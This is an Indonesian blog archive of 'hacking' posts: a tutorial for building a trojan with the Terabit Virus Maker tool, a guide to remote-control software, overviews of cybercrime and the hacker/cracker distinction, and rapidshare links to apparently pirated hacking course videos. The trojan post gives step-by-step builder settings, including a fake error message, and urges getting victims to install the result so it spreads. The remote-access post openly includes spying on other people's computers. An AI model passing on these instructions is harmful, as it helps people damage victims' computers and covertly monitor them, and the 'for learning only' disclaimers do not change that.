Tampilkan postingan dengan label hacking. Tampilkan semua postingan
Tampilkan postingan dengan label hacking. Tampilkan semua postingan

Sabtu, 07 Mei 2011

Membuat virus trojan


Disini kita akan membahas gimana cara membuat virus, sebenarnya gampang-gampang susah, untuk orang-orang awam sih sulit tuk membuat virus, tapi disini ada software utuk membuat virus. Jangan panjang lebar untuk itu. Kita perkenalkan Terabit Virus Maker. 3.2 SE software ini bisa membuat virus berjenis trojan, banyak kegunananya misalnya :
1.Menghapus shotcut di desktop
2.tidak ada suara dalam volume
3.Mematikan komputer dalam 5 menit
4.dsb
dan cara penggunaanya sangat gampang :
1.Buka dulu Terabit Virus Maker 3.2 SE
2.Pilihlah cara virus bekerja,
3.klik kotak putih Fake error Message dan ketiklah pesan yang pada virus agar yang tertuju membaca pesan anda tersebut.
4.Ketik berapa byte yang anda kehendaki, semakin besar byte yang anda ketik semakin besar pula virus yang anda buat
5.nama virus sebelum di instal
6.pilihlah gambar yang anda kehendaki dan Nama virus
7.lalu klik Create Virus, exit,

Jadi dech virus yang anda buat dan suruh instal virus yang anda buat tadi agar virus tersebut menyebar pada komputer yang anda tuju, terima kasih semoga bermanfaat.

Untuk download virus tersebut sedott...

ini bukanlah alat untuk merusak tapi untuk di pelajari..

Jumat, 02 Juli 2010

Remote Komputer (mengendalikan komputer dari jarak jauh)

Kita dapat mengakses computer lain dari computer kita (remote computer), atau mengendalikannya dari jarak jauh seperti menggerakkan mouse, membuka aplikasi (Ms Word, Excell, Power point, dll) membuka dan mengedit  semua file yang ada dikomputer tersebut full akses, mencetak file (print file) dll, jika kita memiliki computer dikantor dan ingin mengaksesnya dari rumah, atau sekedar memantau aktifitas teman kita dikomputer lain dalam 1 network, membatasi penggunaan computer untuk keperluan kantor, atau bahkan memata-matai apa yang sedang di kerjakan dikomputer orang lain dalam 1 local area network ataupun melalui jaringan internet. Sebelumnya mohon maaf artikel ini hanya pengetahuan bukan untuk disalahgunakan.

Langkah ke-1, download salah satu atau semua dari program / instalasi dibawah ini :
Langkah ke-2, install salah satu file yang sudah terdownload tersebut kekomputer Anda dan computer yang ingin Anda remote, file installernya harus sama jika Anda mendownload pada program 1 maka install kedua computer tersebut dengan file hasil download program 1 jangan ditukar-tukar. Pada saat pengistallan akan ada option Server / Client, dikomputer anda harus terinstall server akan tetapi anda bisa memilih keduanya. Server adalah tempat kita mengakses dan client adalah computer yang akan kita remote. Ketiga program diatas fungsinya sama akan tetapi ada 1 program yang hanya trial version selama 30hari, sedangkan yang lainnya ada yang full gratis, Anda bisa mencoba-coba sendiri.
Langkah ke-3, setelah ke-2 computer atau lebih yang sudah Anda install selesai coba jalankan aplikasinya di computer Anda. Anda akan diminta untuk menambahkan computer Client, caranya mudah tinggal klik Add, kemudian Browse computer nah… disitu akan muncul nama-nama computer yang sudah anda install, klik satu persatu. Anda bisa memilih computer yang akan Anda remote dengan melakukan double klik, melakukan akses apa saja seperti halnya Anda duduk didepan computer client, duduk dirumah tetapi seolah-olah sedang dikantor.
Selamat mencoba

Kejahatan Di Internet (Cyber Crime)

Di indonesia bukan hanya terkenal sebagai negara terkorup di dunia, melainkan juga Negara dengan “carder” tertinggi di muka bumi, setelah Ukrania. “carder” adalah penjahat di internet, yang membeli barang di toko maya (online shoping) dengan memakai kartu kredit milik orang lain. Meski pengguna internet Indonesia masih sedikit dibanding negara Asia Tenggara lainnya, apalagi dibanding Asia atau negara-negara maju, nama warga Indonesia di internet sudah “ngetop” dan tercemar! Indonesia masuk “blacklist” di sejumlah online shoping ternama, khususnya di amazon.com dan ebay.com Kartu kredit asal Indonesia diawasi bahkan diblokir.
Sesungguhnya, sebagai media komunikasi yang baru, internet memberikan sejuta manfaat dan kemudahan kepada pemakainya. Namun internet juga mengundang ekses negatif, dalam berbagai tindak kejahatan yang menggloblal. Misalnya, tindak penyebaran produk pornorgrafi, pedofilia, perjudian, sampah (spam), bermacam virus, sabotase, dan aneka penipuan, seperti carding, phising, spamming, dll. Yang gawat, nama negara terseret karenanya.

Berikut sejumlah jenis kejahatan via internet :



CARDING


Carding adalah berbelanja menggunakan nomor dan identitas kartu kredit orang lain, yang diperoleh secara ilegal, biasanya dengan mencuri data di internet. Sebutan pelakunya adalah “carder”. Sebutan lain untuk kejahatan jenis ini adalah cyberfroud alias penipuan di dunia maya. Menurut riset Clear Commerce Inc, perusahaan teknologi informasi yang berbasis di Texas – AS , Indonesia memiliki “carder” terbanyak kedua di dunia setelah Ukrania. Sebanyak 20 persen transaksi melalui internet dari Indonesia adalah hasil carding. Akibatnya, banyak situs belanja online yang memblokir IP atau internet protocol (alamat komputer internet) asal Indonesia. Kalau kita belanja online, formulir pembelian online shop tidak mencantumkan nama negara Indonesia. Artinya konsumen Indonesia tidak diperbolehkan belanja di situs itu.

Menurut pengamatan ICT Watch, lembaga yang mengamati dunia internet di Indonesia, para carder kini beroperasi semakin jauh, dengan melakukan penipuan melalui ruang-ruang chatting di mIRC. Caranya para carder menawarkan barang-barang seolah-olah hasil carding-nya dengan harga murah di channel. Misalnya, laptop dijual seharga Rp 1.000.000. Setelah ada yang berminat, carder meminta pembeli mengirim uang ke rekeningnya. Uang didapat, tapi barang tak pernah dikirimkan.


HACKING


Hacking adalah kegiatan menerobos program komputer milik orang/pihak lain. Hacker adalah orang yang gemar ngoprek komputer, memiliki keahlian membuat dan membaca program tertentu, dan terobsesi mengamati keamanan (security)-nya. “Hacker” memiliki wajah ganda; ada yang budiman ada yang pencoleng. “Hacker” budiman memberi tahu kepada programer yang komputernya diterobos, akan adanya kelemahan-kelemahan pada program yang dibuat, sehingga bisa “bocor”, agar segera diperbaiki. Sedangkan, hacker pencoleng, menerobos program orang lain untuk merusak dan mencuri datanya.


CRACKING


Cracking adalah hacking untuk tujuan jahat. Sebutan untuk “cracker” adalah “hacker” bertopi hitam (black hat hacker). Berbeda dengan “carder” yang hanya mengintip kartu kredit, “cracker” mengintip simpanan para nasabah di berbagai bank atau pusat data sensitif lainnya untuk keuntungan diri sendiri. Meski sama-sama menerobos keamanan komputer orang lain, “hacker” lebih fokus pada prosesnya. Sedangkan “cracker” lebih fokus untuk menikmati hasilnya. Kasus kemarin, FBI bekerja sama dengan polisi Belanda dan polisi Australia menangkap seorang cracker remaja yang telah menerobos 50 ribu komputer dan mengintip 1,3 juta rekening berbagai bank di dunia. Dengan aksinya, “cracker” bernama Owen Thor Walker itu telah meraup uang sebanyak Rp1,8 triliun. “Cracker” 18 tahun yang masih duduk di bangku SMA itu tertangkap setelah aktivitas kriminalnya di dunia maya diselidiki sejak 2006.


DEFACING


Defacing adalah kegiatan mengubah halaman situs/website pihak lain, seperti yang terjadi pada situs Menkominfo dan Partai Golkar, BI baru-baru ini dan situs KPU saat pemilu 2004 lalu. Tindakan deface ada yang semata-mata iseng, unjuk kebolehan, pamer kemampuan membuat program, tapi ada juga yang jahat, untuk mencuri data dan dijual kepada pihak lain.


PHISING


Phising adalah kegiatan memancing pemakai komputer di internet (user) agar mau memberikan informasi data diri pemakai (username) dan kata sandinya (password) pada suatu website yang sudah di-deface. Phising biasanya diarahkan kepada pengguna online banking. Isian data pemakai dan password yang vital yang telah dikirim akhirnya akan menjadi milik penjahat tersebut dan digunakan untuk belanja dengan kartu kredit atau uang rekening milik korbannya.


SPAMMING


Spamming adalah pengiriman berita atau iklan lewat surat elektronik (e-mail) yang tak dikehendaki. Spam sering disebut juga sebagai bulk email atau junk e-mail alias “sampah”. Meski demikian, banyak yang terkena dan menjadi korbannya. Yang paling banyak adalah pengiriman e-mail dapat hadiah, lotere, atau orang yang mengaku punya rekening di bank di Afrika atau Timur Tengah, minta bantuan “netters” untuk mencairkan, dengan janji bagi hasil. Kemudian korban diminta nomor rekeningnya, dan mengirim uang/dana sebagai pemancing, tentunya dalam mata uang dolar AS, dan belakangan tak ada kabarnya lagi. Seorang rector universitas swasta di Indonesia pernah diberitakan tertipu hingga Rp1 miliar dalam karena spaming seperti ini.


MALWARE


Malware adalah program komputer yang mencari kelemahan dari suatu software. Umumnya malware diciptakan untuk membobol atau merusak suatu software atau operating system. Malware terdiri dari berbagai macam, yaitu: virus, worm, trojan horse, adware, browser hijacker, dll. Di pasaran alat-alat komputer dan toko perangkat lunak (software) memang telah tersedia antispam dan anti virus, dan anti malware. Meski demikian, bagi yang tak waspadai selalu ada yang kena. Karena pembuat virus dan malware umumnya terus kreatif dan produktif dalam membuat program untuk mengerjai korban-korbannya.


Hati-hati Kejahatan Internet ..!


Dedemit Dunia Maya Acak-acak Situs Penting

Saat ini penanganan kejahatan di dunia maya (cyber crime) masih minim, padahal Indonesia termasuk negara dengan kasus cyber crime tertinggi di bawah Ukrania. Penanganan kasus kejahatan jenis ini memang membutuhkan kemampuan khusus dari para penegak hukum.

Dari kasus-kasus yang terungkap selama ini, pelaku diketahui memiliki tingkat kepandaian di atas rata-rata. Selain karena motif ekonomi, sebagian hacker melakukan tindakan merusak website orang lain hanya sekadar untuk pamer kemampuan. Kasus terakhir, Rizky Martin, 27, alias Steve Rass, 28, dan Texanto alias Doni Michael melakukan transaksi pembelian barang atas nama Tim Tamsin Invex Corp, perusahaan yang berlokasi di AS melalui internet. Keduanya menjebol kartu kredit melalui internet banking sebesar Rp350 juta. Dua pelaku ditangkap aparat Cyber Crime Polda Metro Jaya pada 10 Juni 2008 di sebuah warnet di kawasan Lenteng Agung, Jaksel. Awal Mei 2008 lalu, Mabes Polri menangkap “hacker” bernama Iqra Syafaat, 24, di satu warnet di Batam, Riau, setelah melacak IP addressnya dengan nick name Nogra alias Iqra. Pemuda tamatan SMA tersebut dinilai polisi berotak encer dan cukup dikenal di kalangan hacker. Dia pernah menjebol data sebuah website lalu menjualnya ke perusahaan asing senilai Rp600 ribu dolar atau sekitar Rp6 miliar. Dalam pengakuannya, hacker lokal ini sudah pernah menjebol 1.257 situs jaringan yang umumnya milik luar negeri. Bahkan situs Presiden SBY pernah akan diganggu, tapi dia mengurungkan niatnya.
Kasus lain yang pernah diungkap polisi pada tahun 2004 ialah saat situs milik KPU (Komisi Pemilihan Umum) yang juga diganggu hacker. Tampilan lambang 24 partai diganti dengan nama ‘partai jambu’, ‘partai cucak rowo’ dan lainnya. Pelakunya, diketahui kemudian, bernama Dani Firmansyah,24, mahasiswa asal Bandung yang kemudian ditangkap Polda Metro Jaya. Motivasi pelaku, konon, hanya ingin menjajal sistem pengamanan di situs milik KPU yang dibeli pemerintah seharga Rp 200 miliar itu. Dan ternyata berhasil.


BOBOL KARTU KREDIT


Data di Mabes Polri, dari sekitar 200 kasus cyber crime yang ditangani hampir 90 persen didominasi carding dengan sasaran luar negeri. Aktivitas internet memang lintas negara. Yang paling sering jadi sasaran adalah Amerika Serikat, Australia, Kanada dan lainnya. Pelakunya berasal dari kota-kota besar seperti Yogyakarta, Bandung, Jakarta, Semarang, Medan serta Riau. Motif utama adalah ekonomi. Peringkat kedua hacking dengan merusak dan menjebol website pihak lain dengan tujuan beragam, mulai dari membobol data lalu menjualnya atau iseng merusak situs tertentu.

Kejahatan internet lainnya, pornografi yakni menjadikan internet sebagai arena prostitusi. Sejumlah situs porno yang digunakan sebagai pelacuran terselubung dan penjualan aksesoris seks pernah diusut Polda Metro Jaya, dan pengelolanya ditangkap. Situs judi seperti indobetonline.com, juga pernah dibongkar Mabes Polri. Selain itu, belum lama ini, kepolisian Tangerang juga membongkar judi di situs tangkas.net yang menyediakan judi bola tangkas, Mickey Mouse dan lainnya. Kejahatan lainnya, penipuan lewat internet.

“Kejahatan internet ada dua kategori, yakni sasaran utamanya fasilitas komputer sebagai alat teknologi dan tidak hanya sebagai sarana. Kategori ke dua, menjadikan komputer sebagai sarana melakukan kejahatan.

Hacker dan Cracker

Istilah “Hacking” dan “cracking” mungkin sudah tidak asing lagi bagi para pengguna internet. Tidak sedikit orang yang sering kali menyalahgunakan fungsi dari hacking dan cracking tersebut. Bahkan hanya untuk mendapatkan kepuasan, mereka tidak ragu-ragu untuk mengganti informasi pada web/blog yang telah berhasil mereka bobol. Sebut saja contohnya pada pemilu 2004 lalu, tepatnya hari Sabtu 17 April, salah seorang konsultan Teknologi Informasi (TI) di salah satu perusahaan swasta di Jakarta berhasil membobol situs milik Komisi Pemilihan Umum (KPU)
di http://tnp.kpu.go.id dan mengubah nama-nama partai di dalamnya menjadi nama-nama yang "unik", seperti Partai Kolor Ijo, Partai Mbah Jambon, Partai Jambu, dan lain sebagainya. Kemudian dia tertangkap pada hari Kamis, 22 April 2004. * nah loh, apa hukumannya yaa..???? *
Sebaliknya, banyak juga orang yang memanfaatkan kepiawaiannya tersebut untuk memudahkan masyarakat agar tidak “gaptek” alias gagap teknologi. Contohnya, mengubah suatu program/aplikasi berbahasa asing ke dalam bahasa Indonesia agar bisa dinikmati oleh masyarakat Indonesia, atau memberitahu admin suatu web/blog bahwa ada suatu celah security system yang memungkinkan orang lain untuk membobol web/blog tersebut dan tentu saja memberikan solusinya. * yang ini baru kerennn..!! metal poko na mah \m/ *
Di Indonesia, menurut Yogyafree White Hacker Community terdapat komunitas- komunitas Hacker, diantaranya yaitu :


* White hacker atau White Hacker Community, adalah Personal atau sekelompok orang atau komunitas yang mengunakan hacking untuk kepentingan dan bertujuan yang positif serta untuk mencari celah keamanan suatu sistem maupun suatu software serta memperbaiki celah keamanan yang ditemukan tersebut (atau menginformasikan celah keamanan yang ditemukan kepada pemilik system tersebut). Berani menampakkan dirinya secara terang-terangan, ada struktur organisasi yang jelas dan tanggung jawab ada pada masing2 personal pelakunya maupun pada organisasi serta mau berbagi ilmu / sharing pengalaman dengan public.


* Black Hacker atau Black Hacker Community, adalah Personal atau sekelompok orang atau komunitas yang mengunakan hacking untuk kepentingan pribadi dan bertujuan merusak, mencuri data atau informasi, mengunakan Carding untuk keuntungan pribadi, serta merugikan orang lain, tidak berani menampakkan dirinya secara terang-terangan dan tanggung jawab ada pada masing-masing personal pelakunya. Serta lebih menyukai gaya hidup individual dari pada bermasyarakat.


* Blue Hat Adalah Personal atau sekelompok orang / komunitas yang mengunakan hacking sebagai security advisor…

Sejarah Hacker dan Cracker
Hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka beroperasi dengan sejumlah komputer mainframe. Kata hacker pertama kali muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik dari yang telah dirancang bersama. Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.
Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini 'cracker' dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak
bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker.
Para hacker mengadakan pertemuan setiap setahun sekali yaitu diadakan setiap pertengahan bulan Juli di Las Vegas.
Ajang pertemuan hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas hacking.
Pengertian Hacker dan Cracker
 
1. Hacker
Hacker adalah sebutan untuk mereka yang memberikan sumbangan yang bermanfaat kepada jaringan komputer, membuat program kecil dan membagikannya dengan orang-orang di Internet. Sebagai contoh : digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer. Digigumi ini menggunakan teknik teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya, game Chrono Trigger berbahasa Inggris dapat diubah menjadi bahasa Indonesia. Oleh karena itu, status Digigumi adalah hacker, namun bukan sebagai perusak. Hacker disini artinya, mencari, mempelajari dan mengubah sesuatu untuk keperluan hobi dan pengembangan dengan mengikuti legalitas yang telah ditentukan oleh developer game. Para hacker biasanya melakukan penyusupan-penyusupan dengan maksud memuaskan pengetahuan dan teknik. Rata - rata perusahaan yang bergerak di dunia jaringan global (internet) juga memiliki hacker. Tugasnya yaitu untuk menjaga jaringan dari kemungkinan perusakan pihak luar "cracker", menguji jaringan dari kemungkinan lobang yang menjadi peluang para cracker mengobrak - abrik jaringannya, sebagai contoh : perusahaan asuransi dan auditing "Price Waterhouse". Ia memiliki team hacker yang disebut dengan Tiger Team. Mereka bekerja untuk menguji sistem sekuriti client mereka.
2. Cracker
Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat destruktif, biasanya di jaringan komputer, mem-bypass password atau lisensi program komputer, secara sengaja melawan keamanan komputer, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain, mencuri data dan umumnya melakukan cracking untuk keuntungan sendiri, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem.


Hirarki / Tingkatan Hacker
1. Elite
Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.
2. Semi Elite
Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.
3. Developed Kiddie
Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
4. Script Kiddie
Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
5. Lamer
Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.


Cracker tidak mempunyai hirarki khusus karena sifatnya hanya membongkar dan merusak.
Kode Etik Hacker
1. Mampu mengakses komputer tak terbatas dan totalitas.
2. Semua informasi haruslah FREE.
3. Tidak percaya pada otoritas, artinya memperluas desentralisasi.
4. Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi, dll.
5. Mampu membuat seni keindahan dalam komputer.
6. Komputer dapat mengubah hidup menjadi lebih baik.
7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.
8. Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.
9. Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.
10. Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.
Cracker tidak memiliki kode etik apapun.
Aturan Main Hacker
Gambaran umum aturan main yang perlu di ikuti seorang hacker seperti di jelaskan oleh Scorpio, yaitu:
· Di atas segalanya, hormati pengetahuan & kebebasan informasi.
· Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.
· Jangan mengambil keuntungan yang tidak fair dari hack.
· Tidak mendistribusikan & mengumpulkan software bajakan.
· Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri.
· Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh.
· Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
· Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
· Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.
· Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.
Hacker sejati akan selalu bertindak berlandaskan kode etik dan aturan main sedang cracker tidak mempunyai kode etik ataupun aturan main karena cracker sifatnya merusak.


Perbedaan Hacker dan Cracker
a. Hacker
1.Mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs. Sebagai contoh : jika seorang hacker mencoba menguji situs Yahoo! dipastikan isi situs tersebut tak akan berantakan dan mengganggu yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna.
2.Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja.
3. Seorang Hacker tidak pelit membagi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.
b. Cracker
1. Mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan. Sebagia contoh : Virus, Pencurian Kartu Kredit, Kode Warez, Pembobolan Rekening Bank, Pencurian Password E-mail/Web Server.
2. Bisa berdiri sendiri atau berkelompok dalam bertindak.
3. Mempunyai situs atau cenel dalam IRC yang tersembunyi, hanya orang-orang tertentu yang bisa mengaksesnya.
4. Mempunyai IP yang tidak bisa dilacak.
5. Kasus yang paling sering ialah Carding yaitu Pencurian Kartu Kredit, kemudian pembobolan situs dan mengubah segala isinya menjadi berantakan. Sebagai contoh : Yahoo! pernah mengalami kejadian seperti ini sehingga tidak bisa diakses dalam waktu yang lama, kasus clickBCA.com yang paling hangat dibicarakan tahun 2001 lalu.


Dua Jenis Kegiatan Hacking
1. Social Hacking, yang perlu diketahui : informasi tentang system apa yang dipergunakan oleh server, siapa pemilik server, siapa Admin yang mengelola server, koneksi yang dipergunakan jenis apa lalu bagaimana server itu tersambung internet, mempergunakan koneksi siapa lalu informasi apa saja yang disediakan oleh server tersebut, apakah server tersebut juga tersambung dengan LAN di sebuah organisasi dan informasi lainnya
2. Technical Hacking, merupakan tindakan teknis untuk melakukan penyusupan ke dalam system, baik dengan alat bantu (tool) atau dengan mempergunakan fasilitas system itu sendiri yang dipergunakan untuk menyerang kelemahan (lubang keamanan) yang terdapat dalam system atau service. Inti dari kegiatan ini adalah mendapatkan akses penuh kedalam system dengan cara apapun dan bagaimana pun.


Contoh Kasus Hacker
1. Pada tahun 1983, pertama kalinya FBI menangkap kelompok kriminal komputer The 414s(414 merupakan kode area lokal mereka) yang berbasis di Milwaukee AS. Kelompok yang kemudian disebut hacker tersebut melakukan pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.
2. Digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer dengan menggunakan teknik teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya : game Chrono Trigger berbahasa Inggris dapat diubah menjadi bahasa Indonesia. Oleh karena itu, status Digigumi adalah hacker, namun bukan sebagai perusak.
3. Pada hari Sabtu, 17 April 2004, Dani Firmansyah, konsultan Teknologi Informasi (TI) PT Danareksa di Jakarta berhasil membobol situs milik Komisi Pemilihan Umum (KPU) di http://tnp.kpu.go.id dan mengubah nama-nama partai di dalamnya menjadi nama-nama "unik", seperti Partai Kolor Ijo, Partai Mbah Jambon, Partai Jambu, dan lain sebagainya. Dani menggunakan teknik SQL Injection(pada dasarnya teknik tersebut adalah dengan cara mengetikkan string atau perintah tertentu di address bar browser) untuk menjebol situs KPU. Kemudian Dani tertangkap pada hari Kamis, 22 April 2004.
Akibat yang Ditimbulakan oleh Hacker dan Cracker
Hacker : membuat teknologi internet semakin maju karena hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software, membuat gairah bekerja seorang administrator kembali hidup karena hacker membantu administrator untuk memperkuat jaringan mereka.
Cracker : merusak dan melumpuhkan keseluruhan sistem komputer, sehingga data-data pengguna jaringan rusak, hilang, ataupun berubah.


Kesimpulan
Para hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software. Oleh karena itu, berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Maka hacker dapat disebut sebagai pahlawan jaringan sedang cracker dapat disebut sebagai penjahat jaringan karena melakukan melakukan penyusupan dengan maksud menguntungkan dirinya secara personallity dengan maksud merugikan orang lain. Hacker sering disebut hacker putih (yang merupakan hacker sejati yang sifatnya membangun) dan hacker hitam (cracker yang sifatnya membongkar dan merusak)

Minggu, 27 Juni 2010

Hacking Video – Career Academy Hacking


Hacking Video   Career Academy Hacking tutorial hacking web desain 
grafisLagi-lagi video hacking bertebaran secara gratis. Yup, baru-baru ini ilmuwebsite staff menemukan harta karun luar biasa, video hacking academy, mulai dari Ethical Hacking, Penetration Testing, Footprinting, Reconnaissance, TCP IP Basics ,Scanning, Honeypots, Honeynets sampai dengan wireless hacking pun dibahas dalam video. Yang lebih menarik lagi, didalamnya di sediakan demo penetration testing lebih dari 300+ vulnerability. :D ---- dan tentunya sebanding dengan kapasitasnya yang lebih dari 3 GB.

Silahkan bagi yang tertarik untuk mendownloadnya :

-Training Module 1 Ethical Hacking and Penetration Testing - cd 1
-Training Module 2 Footprinting and Reconnaissance - cd 2
-Training Module 3 TCP IP Basics and Scanning - cd 3
-Training Module 4 Enumeration and Verification - cd 4
-Training Module 5 Hacking Defending Wireless Modems - cd 5
-Training Module 6 Hacking Defending Web Servers - cd 6
-Training Module 7 Hacking Defending Web Applications - cd 7
-Training Module 8 Sniffers and Session Hijacking - cd 8
-Training Module 9 Hacking Defending Windows Systems - cd 9
-Training Module 10 Hacking Defending Unix Systems - cd 10
-Training Module 11 Rootkits Backdoors Trojans Tunnels - cd 11
-Training Module 12 Denial of Service and Botnets - cd 12
-Training Module 13 Automated Pen Testing Tools - cd 13
-Training Module 14 Intrusion Detection Systems - cd 14
-Training Module 15 Firewalls - cd 15
-Training Module 16 Honeypots and Honeynets - cd 16
-Training Module 17 Ethics and Legal Issues - cd 17
http://rapidshare.com/files/194379379/Gxc.VT.CAHPTaCT_UDS.part01.rar
http://rapidshare.com/files/194382133/Gxc.VT.CAHPTaCT_UDS.part02.rar
http://rapidshare.com/files/194377149/Gxc.VT.CAHPTaCT_UDS.part03.rar
http://rapidshare.com/files/194377617/Gxc.VT.CAHPTaCT_UDS.part04.rar
http://rapidshare.com/files/194379332/Gxc.VT.CAHPTaCT_UDS.part05.rar
http://rapidshare.com/files/194377712/Gxc.VT.CAHPTaCT_UDS.part06.rar
http://rapidshare.com/files/194377133/Gxc.VT.CAHPTaCT_UDS.part07.rar
http://rapidshare.com/files/194379107/Gxc.VT.CAHPTaCT_UDS.part08.rar
http://rapidshare.com/files/194379430/Gxc.VT.CAHPTaCT_UDS.part09.rar
http://rapidshare.com/files/194377280/Gxc.VT.CAHPTaCT_UDS.part10.rar
http://rapidshare.com/files/194379072/Gxc.VT.CAHPTaCT_UDS.part11.rar
http://rapidshare.com/files/194380389/Gxc.VT.CAHPTaCT_UDS.part12.rar
http://rapidshare.com/files/194379054/Gxc.VT.CAHPTaCT_UDS.part13.rar
http://rapidshare.com/files/194379376/Gxc.VT.CAHPTaCT_UDS.part14.rar
http://rapidshare.com/files/194377484/Gxc.VT.CAHPTaCT_UDS.part15.rar
http://rapidshare.com/files/194379264/Gxc.VT.CAHPTaCT_UDS.part16.rar
http://rapidshare.com/files/194380491/Gxc.VT.CAHPTaCT_UDS.part17.rar
http://rapidshare.com/files/194379192/Gxc.VT.CAHPTaCT_UDS.part18.rar
http://rapidshare.com/files/194379700/Gxc.VT.CAHPTaCT_UDS.part19.rar
http://rapidshare.com/files/194377767/Gxc.VT.CAHPTaCT_UDS.part20.rar
http://rapidshare.com/files/194378937/Gxc.VT.CAHPTaCT_UDS.part21.rar
http://rapidshare.com/files/194380403/Gxc.VT.CAHPTaCT_UDS.part22.rar
http://rapidshare.com/files/194379344/Gxc.VT.CAHPTaCT_UDS.part23.rar
http://rapidshare.com/files/194377766/Gxc.VT.CAHPTaCT_UDS.part24.rar
http://rapidshare.com/files/194381936/Gxc.VT.CAHPTaCT_UDS.part25.rar
http://rapidshare.com/files/194379027/Gxc.VT.CAHPTaCT_UDS.part26.rar
http://rapidshare.com/files/194379882/Gxc.VT.CAHPTaCT_UDS.part27.rar
http://rapidshare.com/files/194379279/Gxc.VT.CAHPTaCT_UDS.part28.rar
http://rapidshare.com/files/194377828/Gxc.VT.CAHPTaCT_UDS.part29.rar
